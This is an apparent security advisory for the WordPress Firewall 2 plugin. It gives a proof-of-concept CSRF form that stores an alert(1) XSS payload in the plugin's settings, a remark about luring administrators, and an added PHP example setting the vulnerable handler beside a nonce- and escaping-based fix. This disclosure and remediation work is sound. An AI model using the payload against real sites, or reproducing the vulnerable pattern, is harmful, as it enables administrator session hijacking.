The plugin's settings handler neither verifies a nonce (so there is no CSRF protection) nor escapes the saved value before echoing it back into the form, so an attacker who gets a logged-in administrator to submit a crafted form can store arbitrary HTML, including script, on the plugin's settings page (stored XSS delivered via CSRF).
Proof of concept
Visit the following page, click on the submit button, then visit the plugin’s options page:
<form method="POST" action="http://localhost/wp-admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php">
  <!-- The payload is entity-encoded here so that the whole string, including the leading quote,
       is submitted as the field value; decoded it is: "><script>alert(1)</script> -->
  <input type="text" name="email_address" value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">
  <input type="text" name="set_email" value="Set Email">
  <input type="submit">
</form>
In a real attack the form is submitted automatically by script as soon as the attacker's page loads, so the administrator only has to visit that page while logged in to WordPress; the stored script then runs in the browser of every administrator who opens the settings page, with their session. Luring an administrator to such a page with a convincing spear-phishing email is routine.
Disable the plugin until a new version is released that fixes this bug.
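For plugin developers, the following is an added example (not code from WordPress Firewall 2 or from WordPress core) that puts the vulnerable settings-handler pattern the advisory describes beside a hardened version built on the WordPress capability, nonce, sanitization and escaping APIs. The option name, nonce action and the `fw2_demo_*` function names are invented for the example.

```php
<?php
/*
 * Added example, not code from WordPress Firewall 2. It shows the vulnerable
 * pattern described in the advisory next to a hardened version using core
 * WordPress APIs. The option name, nonce action and fw2_demo_* function
 * names are made up for this example.
 */

// Vulnerable: no capability check, no nonce, raw POST data stored, value echoed unescaped.
function fw2_demo_vulnerable_settings_page() {
    if ( isset( $_POST['set_email'] ) ) {
        // Any cross-site POST that carries the admin's cookies lands here (CSRF).
        update_option( 'fw2_demo_email', $_POST['email_address'] );
    }
    $email = get_option( 'fw2_demo_email', '' );
    // A stored value of "><script>alert(1)</script> closes the value attribute
    // and injects script for every admin who views this page (stored XSS).
    echo '<form method="post">';
    echo '<input type="text" name="email_address" value="' . $email . '">';
    echo '<input type="submit" name="set_email" value="Set Email">';
    echo '</form>';
}

// Hardened: capability check, nonce check, validation on save, escaping on output.
function fw2_demo_hardened_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You do not have permission to manage these settings.' );
    }

    if ( isset( $_POST['set_email'] ) ) {
        // Dies with a 403 unless the request carries a valid nonce for this
        // action, which a form hosted on an attacker's site cannot supply.
        check_admin_referer( 'fw2_demo_set_email', 'fw2_demo_nonce' );

        $email = sanitize_email( wp_unslash( $_POST['email_address'] ) );
        if ( is_email( $email ) ) {
            update_option( 'fw2_demo_email', $email );
        } else {
            add_settings_error( 'fw2_demo', 'invalid_email', 'Please enter a valid email address.' );
        }
    }

    settings_errors( 'fw2_demo' );
    $email = get_option( 'fw2_demo_email', '' );

    echo '<form method="post">';
    // Emits a hidden field named fw2_demo_nonce tied to the current user's session.
    wp_nonce_field( 'fw2_demo_set_email', 'fw2_demo_nonce' );
    // esc_attr() turns a stored "> into &quot;&gt;, so it cannot break out of the attribute.
    echo '<input type="text" name="email_address" value="' . esc_attr( $email ) . '">';
    submit_button( 'Set Email', 'primary', 'set_email' );
    echo '</form>';
}
```

Both halves of the fix matter: the nonce check rejects the advisory's proof-of-concept form outright, and `esc_attr()` on output keeps a value that reaches the option by any other route from becoming script. Validating with `is_email()` on save is an additional layer, not a substitute for escaping on output.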